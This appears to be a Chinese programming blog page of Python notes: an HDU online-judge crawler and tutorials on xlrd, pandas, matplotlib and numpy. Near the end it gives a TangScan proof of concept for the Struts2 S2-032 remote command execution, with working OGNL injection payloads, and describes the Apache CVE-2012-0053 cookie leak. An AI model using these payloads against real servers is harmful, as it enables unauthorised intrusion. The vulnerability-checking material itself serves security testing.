标签: python

Hduoj用户AC题数统计爬虫

趁着前几天出去比赛的空余时间瞎写完了

一向写python都是现写现查库怎么用

写这个主要是为了班里统计方便 ,但现在应该用不上了2333

写的挺垃圾,也是第一次搞这个,因为库太好用了感觉自己写的也没啥水平哈哈

其中主要点是判断指定日期的做题AC数

用了下用户实时的提交页面

http://acm.hdu.edu.cn/status.php?first=&pid=&user=aaa&lang=0&status=0

1.爬下直到指定日期最后所有做题情况

2.判断时间是否符合,顺便学习了下datetime

  •    因为日期是从前往后排所以 大于当前日期的跳过,直到遇见最后日期跳出循环
  •    需要注意的就是如果指定日期加之前这个用户没有答题过 会造成死循环 所以判断下当前是否为最后一页 因为get参数没有页数所以就判断first是否重复就ok

3.判断是否ac

4.丢到dict

 

分享一下渣渣代码

# encoding=utf-8
import requests
import re
import xlrd
import xlwt
from bs4 import BeautifulSoup
import datetime


def save_mysql():
    pass


def save_excel(users, Allsolved, pid, sum):
    book = xlwt.Workbook(encoding='utf-8')  # 表格初始化
    sheet1 = book.add_sheet('sheet1', cell_overwrite_ok=True)
    heads = ['ID', u'指定日期累计AC题数' + '(' + start + 'to' + end + ')', u'总共已AC题数', u'指定日期AC题号']
    print u'\n准备将数据存入表格...'
    ii = 0  # 表格初始化用
    for head in heads:
        sheet1.write(0, ii, head)
        ii += 1
    ID_col = 0
    weekid = 3
    week_solved_col = 1
    solved_col = 2
    row = 1
    sheet1.col(week_solved_col).width = 256 * 20
    for user in users:
        sheet1.write(row, ID_col, user)
        row += 1
    row = 1
    for solved in Allsolved:
        sheet1.write(row, solved_col, solved)
        row += 1
    row = 1
    for wid in pid:
        sheet1.write(row, weekid, wid)
        row += 1
    row = 1
    for wsum in sum:
        sheet1.write(row, week_solved_col, wsum)
        row += 1
    book.save('Acm' + start + 'to' + end + '.xls')
    print u'\n录入成功!'


def run(users):
    All_Solved = []
    ID = []
    SUM = []
    for user in users:
        ########目前已做总题数
        userpages = requests.get("http://acm.hdu.edu.cn/userstatus.php?user=" + user)
        n = re.compile(r'>(.*)</h1>')
        s = re.compile(r'Solved</td><td align=center>([0-9]+)<')
        name = n.search(userpages.text)
        solved = s.search(userpages.text)

        print name.group(1) + " " + solved.group(1)
        All_Solved.append(solved.group(1))
        ########每日统计
        sum = 0
        print user
        first = '99999999'
        run_forever = True
        repid = ['|']  # 防止重复+统计题号
        while run_forever:
            req = requests.get(
                "http://acm.hdu.edu.cn/status.php?first=" + first + "&pid=&user=" + user + "&lang=0&status=0")
            soup = BeautifulSoup(req.text, 'lxml')
            tables = soup.findAll('table')
            tab = tables[3]
            old = []
            new = []
            dict = {'Runid': '123', 'Subtime': '2017', 'Status': 'ac', 'Id': '123'}
            for tr in tab.findAll('tr')[1:]:
                i = 1
                for td in tr.findAll('td')[:4]:
                    if i == 1:
                        dict['Runid'] = td.getText()
                        Runid = td.getText()
                    elif i == 2:
                        dict['Subtime'] = td.getText()
                    elif i == 3:
                        dict['Status'] = td.getText()
                    else:
                        dict['Id'] = td.getText()
                    i += 1
                old.append(dict.copy())
            if first == str(int(Runid) - 1):  # 防止当这个用户这个时间段没做过题的情况(死循环)
                break
            for AoW in old:
                time = datetime.datetime.strptime(AoW['Subtime'][0:-9], '%Y-%m-%d')
                if time <= d2 and time >= d1:
                    ac = 'Accepted'
                    # print AoW
                    if AoW['Status'] == ac:
                        for cfid in repid:
                            if AoW['Id'] != cfid:
                                f = 1
                                # T.append(AoW['Id'])
                            else:  # 如果重复 退出循环
                                f = 0
                                break
                        if f == 1:
                            repid.append(AoW['Id'])  # 防止重复
                            repid.append(' ')
                            new.append(AoW)
                elif time < d1:
                    run_forever = False
                    # break
                else:
                    pass

            ####
            for tt in new:
                print tt
            sum += len(new)

            first = str(int(Runid) - 1)  # 最后一个

        print '------'
        print sum
        print '------'
        ID.append(repid)
        SUM.append(sum)
        # print ID
        # print SUM
        # print SUM
    save_excel(users, All_Solved, ID, SUM)


def main():
    # 读入userID
    book = xlrd.open_workbook('./acmid.xlsx')
    sheet = book.sheet_by_name('sheet1')
    users = sheet.col_values(0)
    print users
    run(users)


if __name__ == '__main__':
    print '日期输入格式:年-月-日'
    start = raw_input("起始日期:")
    end = raw_input("终止日期:")
    d1 = datetime.datetime.strptime(start, '%Y-%m-%d')
    d2 = datetime.datetime.strptime(end, '%Y-%m-%d')
    main()

 

 

xlrd基本操作并配合matplotlib绘图笔记

一个简单的小例子快速了解如何利用xlrd读取excel并借助plt绘图

//之前代码有误,导致上图显示女生数量与男生一样,代码已改正

#encoding=utf-8
import xlrd
import matplotlib.pylab as plt
from pylab import *
def main():
    book=xlrd.open_workbook('./pdtest.xlsx')
    sheet_name = book.sheet_names()[0]#获得指定索引的sheet名字
    print sheet_name
    sheet=book.sheet_by_name('sheet1')
    rows=sheet.nrows#行数
    cols=sheet.ncols#列数
    print rows,cols
    row_data=sheet.row_values(0)
    col_data=sheet.col_values(0)
    print row_data,col_data
    cell=sheet.cell_value(1,2)
    print cell
    for i in range(rows):#每行数据
        print sheet.row_values(i)
    col1=sheet.col_values(1)[1:]#去掉列名称 打印指定列
    print col1
    k = 0
    for i in col1:
        print int(i)
        if int(i)==int('2'):
            k+=1
    print k
    book1=xlrd.open_workbook('./reg.xls')
    #sheet_name1=book1.sheet_names()[0]
    #print sheet_name1
    list=book1.sheets()[0]
    nrows=list.nrows
    print nrows
    print "------------------"
    col2=list.col_values(4)[1:]
    g = 0
    b = 0
    for i in col2:
        if i == u"\u5973":
            g=g+1

        if i == u"\u7537":
            b+=1

    print g,b

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    plt.figure(1)
    plt.bar(left=0,height=b,width=0.35,align="center",color="b",label="boy")
    plt.bar(left=0.5,height=g,width=0.35,align="center",color="y",label="girl")
    plt.title(u"2017太原市中考性别分布[柱状图]")
    plt.xlabel(u"性别")
    plt.ylabel(u"人数")
    plt.xticks((0, 0.5), (u"男", u"女"))
    plt.text(0, b+0.05, "%d" % b, ha="center", va="bottom")
    plt.text(0.5, g+0.05, "%d" % g, ha="center", va="bottom")
    #图中有误,之前把代码里面的参数g写成了b
    #plt.legend(loc="upper left")
    plt.show()


if __name__ == '__main__':
    main()

output:

sheet1
5 3
[u'', u'man', u'woman'] [u'', u'a', u'b', u'c', u'd']
1.0
[u'', u'man', u'woman']
[u'a', 2.0, 1.0]
[u'b', 6.0, 3.0]
[u'c', 2.0, 4.0]
[u'd', 1.0, 6.0]
[2.0, 6.0, 2.0, 1.0]
2
6
2
1
2
41609
------------------
20445 21163

 

 

 

Pandas基本操作笔记

Python Data Analysis Library 或 pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。Pandas 纳入了大量库和一些标准的数据模型,提供了高效地操作大型数据集所需的工具。pandas提供了大量能使我们快速便捷地处理数据的函数和方法。你很快就会发现,它是使Python成为强大而高效的数据分析环境的重要因素之一。

#encoding=utf-8
import numpy as np
import pandas as pd
def main():
    #生成表格
    dates=pd.date_range("20170801",periods=8)
    df=pd.DataFrame(np.random.randn(8,5),index=dates,columns=list("ABCDE"))#生成框架
    print df
    dff=pd.DataFrame({"A":np.random.randint(1,10,8),"B":pd.date_range("20170707",periods=8)})
    print dff

    #基本操作
    print df.head(3)#打印前三行
    print df.tail(3)#打印后三行
    print df.index
    print df.values
    print df.T#转置
    print df.sort_values("C")#排序C列 升序
    print df.sort_index(axis=1,ascending=False)#用属性值排序 降序
    print df.describe()#数据的相关信息
    print df["A"]#切片
    print df[:3]
    print df["20170801":"20170806"]
    print df.loc[dates[0]]
    print df.loc["20170802":"20170806",["B","D"]]
    print df.at[dates[0],"C"]
    print df.iloc[1:3,2:4]
    print df.iloc[1,4]#2行第5列
    print df[df.B>0]
    print df[df<0]
    print df[df["E"].isin([1,2])]

    #基本设置
    sl=pd.Series(list(range(10,18)),index=pd.date_range("20170801",periods=8))
    print sl
    df["F"]=sl
    print df
    df.at[dates[0],"A"]=0
    print df
    df.iat[1,4]=666
    df.loc[:,"D"]=np.array([4]*len(df))
    print df
    df2=df.copy()#拷贝
    df2[df2<0]=-df2#负数变为正数
    print df2


if __name__ == '__main__':
    main()

output:

                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
   A          B
0  9 2017-07-07
1  3 2017-07-08
2  3 2017-07-09
3  6 2017-07-10
4  6 2017-07-11
5  4 2017-07-12
6  5 2017-07-13
7  6 2017-07-14
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
DatetimeIndex(['2017-08-01', '2017-08-02', '2017-08-03', '2017-08-04',
               '2017-08-05', '2017-08-06', '2017-08-07', '2017-08-08'],
              dtype='datetime64[ns]', freq='D')
[[ 1.07524464 -0.60505755  0.71275536  2.41815902 -0.02894002]
 [-1.51331977 -0.51708246  1.36323759  0.6185221  -0.45040032]
 [-2.26771071 -2.23593917  2.28891947  2.60836214 -1.1816333 ]
 [-0.27608484 -1.13021474 -0.12282251 -0.54247504 -0.33188383]
 [-0.23136532 -0.48824379  1.75736371 -0.96758439 -1.44857541]
 [ 0.37751303  0.05175454  0.32217176 -0.46223914  0.82356261]
 [ 1.00914409 -0.67055311  0.26280966 -0.86527427 -0.72155023]
 [-0.25735124  0.98478455 -0.29728085 -0.23039814  0.69747694]]
   2017-08-01  2017-08-02  2017-08-03  2017-08-04  2017-08-05  2017-08-06  \
A    1.075245   -1.513320   -2.267711   -0.276085   -0.231365    0.377513   
B   -0.605058   -0.517082   -2.235939   -1.130215   -0.488244    0.051755   
C    0.712755    1.363238    2.288919   -0.122823    1.757364    0.322172   
D    2.418159    0.618522    2.608362   -0.542475   -0.967584   -0.462239   
E   -0.028940   -0.450400   -1.181633   -0.331884   -1.448575    0.823563   

   2017-08-07  2017-08-08  
A    1.009144   -0.257351  
B   -0.670553    0.984785  
C    0.262810   -0.297281  
D   -0.865274   -0.230398  
E   -0.721550    0.697477  
                   A         B         C         D         E
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   E         D         C         B         A
2017-08-01 -0.028940  2.418159  0.712755 -0.605058  1.075245
2017-08-02 -0.450400  0.618522  1.363238 -0.517082 -1.513320
2017-08-03 -1.181633  2.608362  2.288919 -2.235939 -2.267711
2017-08-04 -0.331884 -0.542475 -0.122823 -1.130215 -0.276085
2017-08-05 -1.448575 -0.967584  1.757364 -0.488244 -0.231365
2017-08-06  0.823563 -0.462239  0.322172  0.051755  0.377513
2017-08-07 -0.721550 -0.865274  0.262810 -0.670553  1.009144
2017-08-08  0.697477 -0.230398 -0.297281  0.984785 -0.257351
              A         B         C         D         E
count  8.000000  8.000000  8.000000  8.000000  8.000000
mean  -0.260491 -0.576319  0.785894  0.322134 -0.330243
std    1.158991  0.919133  0.928070  1.436732  0.812523
min   -2.267711 -2.235939 -0.297281 -0.967584 -1.448575
25%   -0.585394 -0.785469  0.166402 -0.623175 -0.836571
50%   -0.244358 -0.561070  0.517464 -0.346319 -0.391142
75%    0.535421 -0.353244  1.461769  1.068431  0.152664
max    1.075245  0.984785  2.288919  2.608362  0.823563
2017-08-01    1.075245
2017-08-02   -1.513320
2017-08-03   -2.267711
2017-08-04   -0.276085
2017-08-05   -0.231365
2017-08-06    0.377513
2017-08-07    1.009144
2017-08-08   -0.257351
Freq: D, Name: A, dtype: float64
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
A    1.075245
B   -0.605058
C    0.712755
D    2.418159
E   -0.028940
Name: 2017-08-01 00:00:00, dtype: float64
                   B         D
2017-08-02 -0.517082  0.618522
2017-08-03 -2.235939  2.608362
2017-08-04 -1.130215 -0.542475
2017-08-05 -0.488244 -0.967584
2017-08-06  0.051755 -0.462239
0.71275536229
                   C         D
2017-08-02  1.363238  0.618522
2017-08-03  2.288919  2.608362
-0.45040032497
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
                   A         B         C         D         E
2017-08-01       NaN -0.605058       NaN       NaN -0.028940
2017-08-02 -1.513320 -0.517082       NaN       NaN -0.450400
2017-08-03 -2.267711 -2.235939       NaN       NaN -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244       NaN -0.967584 -1.448575
2017-08-06       NaN       NaN       NaN -0.462239       NaN
2017-08-07       NaN -0.670553       NaN -0.865274 -0.721550
2017-08-08 -0.257351       NaN -0.297281 -0.230398       NaN
Empty DataFrame
Columns: [A, B, C, D, E]
Index: []
2017-08-01    10
2017-08-02    11
2017-08-03    12
2017-08-04    13
2017-08-05    14
2017-08-06    15
2017-08-07    16
2017-08-08    17
Freq: D, dtype: int64
                   A         B         C         D         E   F
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C         D         E   F
2017-08-01  0.000000 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000 -0.605058  0.712755  4   -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  4  666.000000  11
2017-08-03 -2.267711 -2.235939  2.288919  4   -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823  4   -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364  4   -1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144 -0.670553  0.262810  4   -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281  4    0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000  0.605058  0.712755  4    0.028940  10
2017-08-02  1.513320  0.517082  1.363238  4  666.000000  11
2017-08-03  2.267711  2.235939  2.288919  4    1.181633  12
2017-08-04  0.276085  1.130215  0.122823  4    0.331884  13
2017-08-05  0.231365  0.488244  1.757364  4    1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144  0.670553  0.262810  4    0.721550  16
2017-08-08  0.257351  0.984785  0.297281  4    0.697477  17

 

Matplotlib基本图形笔记

#encoding=utf-8
import matplotlib.pyplot as plt
import numpy as np



#散点图
fig=plt.figure()#画布
ax=fig.add_subplot(3,2,1)#3行3列第一个
n=128
X=np.random.normal(0,1,n)#生成随机数 正态分布 [numpy.random.normal(loc=0.0, scale=1.0, size=None)]  运行代码中 0->此概率分布的均值(对应着整个分布的中心centre) 1->此概率分布的标准差(对应于分布的宽度,scale越大越矮胖,scale越小,越瘦高)n->输出的shape,默认为None,只输出一个值
Y=np.random.normal(0,1,n)
T=np.arctan2(X,Y)
#print X,Y,T
#plt.axes([0.025,0.025,0.95,0.95])#对画图区域设置 axes([x,y,xs,ys])#其中x代表在X轴的位置,y代表在Y轴的位置,xs代表在X轴上向右延展的范围大小,ys代表在Y轴中向上延展的范围大小
ax.scatter(X,Y,s=75,c=T,alpha=0.5)#绘制散点图size color alpha
plt.xlim(-1.5,1.5),plt.xticks([])#x轴范围 不显示坐标轴刻度
plt.ylim(-1.5,1.5),plt.yticks([])
plt.axis()#显示轴
plt.title("scatter")
plt.xlabel("x")
plt.ylabel("y")


#柱状图
ax=fig.add_subplot(322)
n=10
X=np.arange(n)
Y1=(1-X/float(n+1))
Y2=(1-X/float(n))
#print X,Y1,Y2
ax.bar(X,+Y1,facecolor="#9999FF",edgecolor="white")
ax.bar(X,-Y2,facecolor="#FF2222",edgecolor="white")
for x,y in zip(X,Y1):
    plt.text(x+0.1,+y+0.05,"%.2f"%y,ha="center",va="bottom",rotation="45")#bottom是柱状图相对于所标数字的位置
for x,y in zip(X,Y2):
    plt.text(x+0.1,-y-0.05,"%.2f"%y,ha="center",va="top")
plt.title("bar")
plt.yticks([])
plt.xticks([])



#饼图
ax=fig.add_subplot(323)
n=20
Z=np.ones(n)
Z[-1]*=2
ax.pie(Z,explode=Z*0.05,colors=["%f"%(i/float(n)) for i in range(n)],labels=["%.2f"%(i/float(n)) for i in range(n)])
plt.gca().set_aspect("equal")
plt.xticks([])
plt.yticks([])
plt.title("pie")


#极坐标图
fig.add_subplot(324,polar=True)
n=20
t=np.arange(0.0,2*np.pi,2*np.pi/n)
r=10*np.random.rand(n)
plt.polar(t,r)
plt.title("polar")



#3D
from mpl_toolkits.mplot3d import Axes3D
fig.add_subplot(313,projection="3d")
plt.plot([1,3,5,6,7,9],[4,2,2,1,2,3],[6,8,8,7,8,2],linestyle="-.")
plt.title("3D")



#plt.savefig("./fig.png")#保存
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)#参数图像边界和子图之间的额外边距。边距以字体大小单位规定。
plt.show()

 

matplotlib基本绘图笔记

matplotlib基本绘图笔记,跟我一起来绘制一个丑陋的三角函数图吧!

 

#encoding=utf-8

import numpy as np
import matplotlib.pyplot as plt


#基本绘图设置
x=np.linspace(-np.pi,np.pi,256,endpoint=True)#2560个点 是否包含最后一个点
c,s=np.cos(x),np.sin(x)
plt.figure(1)#指定绘制图像1
plt.plot(x,c,color="blue",linewidth=1.5,linestyle="-",label="cos",alpha=0.5)#绘制 (自变量,因变量,颜色,宽度,线形,标签,透明度)
plt.plot(x,s,"r*",label="sin")#"r->红色 *->线形"
plt.title("testruilin cos sin")#标题


#设置轴
ax=plt.gca()#轴的编辑器
ax.spines["right"].set_color("none")#隐藏右面的轴
ax.spines["top"].set_color("none")
ax.spines["left"].set_position(("data",0))#把左面的轴移到数据为0的位置
ax.spines["bottom"].set_position(("data",0))


#轴旁边的数字相关设置
ax.xaxis.set_ticks_position("bottom")#把x轴数字放到x轴下方
ax.yaxis.set_ticks_position("left")
plt.yticks(np.linspace(-1,1,5,endpoint=True))#-1到1标5个点
plt.xlim(-5,5)#范围
for label in ax.get_xticklabels()+ax.get_yticklabels():#字体相关设置
    label.set_fontsize(18)
    label.set_bbox(dict(facecolor="white",edgecolor="black",alpha=0.3))


#其他
plt.grid()#网格线
plt.legend(loc="upper left")#图例位置
#plt.axis([-1,2,0.5,1])#显示范围
plt.fill_between(x,np.abs(x)<0.8,c,c>0.1,color="green",alpha=0.4)#填充效果 横坐标绝对值小于0.8为真即1 从y=1开始往下填充 大于0.8即为0 从0往上填充 这是纵向范围 ,横向范围由c定义范围决定,这里如图是纵坐标为0.1以上的横向距离符合,最后填充符合横向距离与纵向距离的范围的交集


#注释
t=1
plt.plot([t,t],[0,np.cos(t)],"y",linewidth=2.2,linestyle="--")#绘制一条线 两点分别为t,0 t,cos(t)的连线 虚线
plt.annotate("cos(1)",xy=(t,np.cos(t)),xycoords="data",xytext=(+10,+30),textcoords="offset points",arrowprops=dict(arrowstyle="->",connectionstyle="arc3,rad=0.3"))
#注释    基本位置  coords是坐标的意思 xytext=(+10,+30),textcoords="offset points"控制偏移量并设置为相对偏移 arrowprops设置箭头工具 类型 弧度



plt.show()#展示

 

numpy常用操作笔记

#encoding=utf-8
import numpy as np

lst=[[1,2,3],[6,7,8]]
print (type(lst))
np_lst=np.array(lst)
print (type(np_lst))
np_lst=np.array(lst,dtype=np.float)
print np_lst
print (np_lst.shape)#几行几列
print (np_lst.ndim)#维度
print (np_lst.dtype)#类型
print (np_lst.itemsize)#所占字节
print (np_lst.size)#大小

print (np.zeros([2,4]))#定义数组
print (np.ones([3,2]))
print (np.random.rand())#随机数
print (np.random.rand(2,4))
print (np.random.randint(1,10,3))#生成1-10随机的三个整数
print (np.random.choice([1,2,3,5,10,100,666]))#选择指定数字
print (np.random.beta(1,10,100))#beta分布

print (np.arange(1,11).reshape([2,-1]))#生成1-10的等差数列并显示为2行5列

list=np.array([[[1,2,3],
               [4,5,6]],
              [[7,8,9],
               [10,11,12]]
              ])
print (list.sum(axis=0))#axis指定一个维度求和 axis越大越深入 =0对最外层求和 1+7 2+8 3+9 4+10 5+11 6+12
print (list.sum(axis=1))#内层求和 1+4 2+5 3+6 7+10 8+11 9+12
print (list.sum(axis=2))#再深入一层 1+2+3 4+5+6 7+8+9 10+11+12
print (list.max(axis=1))#求最大值
print (list.min(axis=2))#求最小值

lst1=np.array([1,2,3])
lst2=np.array([10,11,12])
print (np.concatenate((lst1,lst2),axis=0))#追加到一起
print (np.vstack((lst1,lst2)))#上下追加到一起 两行
print (np.hstack((lst1,lst2)))#合在一起
print (np.split(lst1,3))#分成3组

output:

<type 'list'>
<type 'numpy.ndarray'>
[[ 1.  2.  3.]
 [ 6.  7.  8.]]
(2, 3)
2
float64
8
6
[[ 0.  0.  0.  0.]
 [ 0.  0.  0.  0.]]
[[ 1.  1.]
 [ 1.  1.]
 [ 1.  1.]]
0.0790300286594
[[ 0.40570725  0.40072322  0.75697423  0.45873189]
 [ 0.84684053  0.80063956  0.02231413  0.57768334]]
[4 5 8]
10
[  1.98939407e-02   1.61285413e-02   1.18716706e-02   8.10961771e-02
   1.63533368e-01   1.44668421e-01   5.11693434e-02   6.59941834e-02
   2.23286959e-02   2.15972016e-01   8.63734013e-02   8.06557908e-02
   1.22880147e-01   1.09686347e-02   6.54980124e-02   1.98280109e-03
   4.08960959e-05   4.99724974e-02   4.46814021e-02   1.38706779e-01
   1.24582838e-01   5.32977093e-02   1.01838024e-01   2.46115301e-01
   6.15260218e-03   1.08537025e-01   1.69927681e-02   1.03185373e-01
   2.02785750e-02   4.68360049e-02   2.35353598e-02   1.53166093e-01
   7.08847154e-02   1.43549143e-02   9.55657510e-02   7.62737256e-02
   5.94670869e-03   5.71465328e-03   3.98867568e-02   6.37016822e-02
   9.69537649e-02   3.52414465e-02   5.60588196e-03   1.45640846e-01
   3.06005428e-02   7.66577878e-02   1.98901419e-02   1.04611224e-01
   1.45486287e-02   4.63747783e-03   1.00559794e-01   4.14864166e-02
   6.97617286e-02   1.21598675e-02   5.18675502e-02   2.67329995e-01
   2.71693357e-01   7.61304550e-02   7.19672528e-02   6.30126936e-03
   3.79026503e-02   2.35909430e-01   5.86051618e-02   2.11428839e-01
   1.35133707e-01   6.62907241e-02   1.38296699e-01   2.88886522e-01
   2.40987292e-02   1.76062934e-02   1.90230382e-01   2.09219429e-01
   3.40778112e-02   4.66014797e-02   5.47428038e-03   2.20511410e-02
   3.19067152e-02   2.47324231e-02   3.66452719e-02   2.97249683e-02
   2.26196050e-01   1.59556704e-02   5.66573658e-04   1.44624707e-01
   8.91173413e-02   4.21186597e-02   3.77105859e-03   2.68561111e-01
   1.88337068e-02   1.12529504e-01   1.14325549e-01   6.22131659e-04
   4.74532828e-01   1.57684391e-01   2.60435883e-02   1.53169399e-03
   2.44662204e-02   2.86626061e-02   1.47198619e-01   4.32705246e-02]
[[ 1  2  3  4  5]
 [ 6  7  8  9 10]]
[[ 8 10 12]
 [14 16 18]]
[[ 5  7  9]
 [17 19 21]]
[[ 6 15]
 [24 33]]
[[ 4  5  6]
 [10 11 12]]
[[ 1  4]
 [ 7 10]]
[ 1  2  3 10 11 12]
[[ 1  2  3]
 [10 11 12]]
[ 1  2  3 10 11 12]
[array([1]), array([2]), array([3])]

 

S2-032 远程命令执行 (POC@Tangscan)

前段时间很火的S2-032 远程命令执行

import re
import string
from StringIO import StringIO
from thirdparty import requests
from modules.exploit import TSExploit
from StringIO import StringIO

class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
            S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def verify(self):
        exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        try:
            r = requests.get(exp_url)
            content = r.content
        except:
            content = ''
        if content.find('88888887') == 0:
            self.result.status = True
            self.result.description = "目标 {url} 存在st2命令执行".format(
            url=self.option.url
        )
        else:
            try:
                headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
                data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"}
                files = {'test': ('1.jpg', StringIO('1'))}
                req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare()
                
                req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj')
                req.headers['Content-Length'] = len(req.body)
                s = requests.Session()
                reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)

                if reponse.content.find('88888887') == 0:
                    self.result.status = True
                    self.result.description = "目标 {url} 存在st2命令执行".format(
                    url=self.option.url
                )
                
                
            except Exception,e:
                print str(e)
    def exploit(self):
        pass

if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

 

谈谈CVE-2012-0053

0x00 前言

看编号就知道是个比较老的洞了,最近测东西的时候又碰到,找了点资料大致看了下形成原因,然后再分享下POC。

0x01 漏洞描述

Apache HTTP Server 2.2.x多个版本没有正确严格限制HTTP请求头信息,HTTP请求头信息超过LimitRequestFieldSize长度时服务器返回400(Bad Request)错误,并在返回信息中将出错请求头内容爆出,攻击者可以利用该漏洞获取httponly cookies。

受影响软件版本:
Apache Http Server:
Affected: 2.2.21, 2.2.20, 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0

细节:

1、当HTTP请求头长度大于apache配置LimitRequestFieldSize长度时,服务器返回400错误页面中会携带LimitRequestFieldSize长度的错误请求头内容,如Cookies,User-agent等。

2、HTTP请求头长度不包含HTTP请求头名称与“:”。

3、Cookies请求头不包含多个cookies之间的空格,为实际多个cookies的长度总和。

4、Apache默认配置LimitRequestFieldSize长度为8196,浏览器正常访问默认截取请求头长度最大为4k

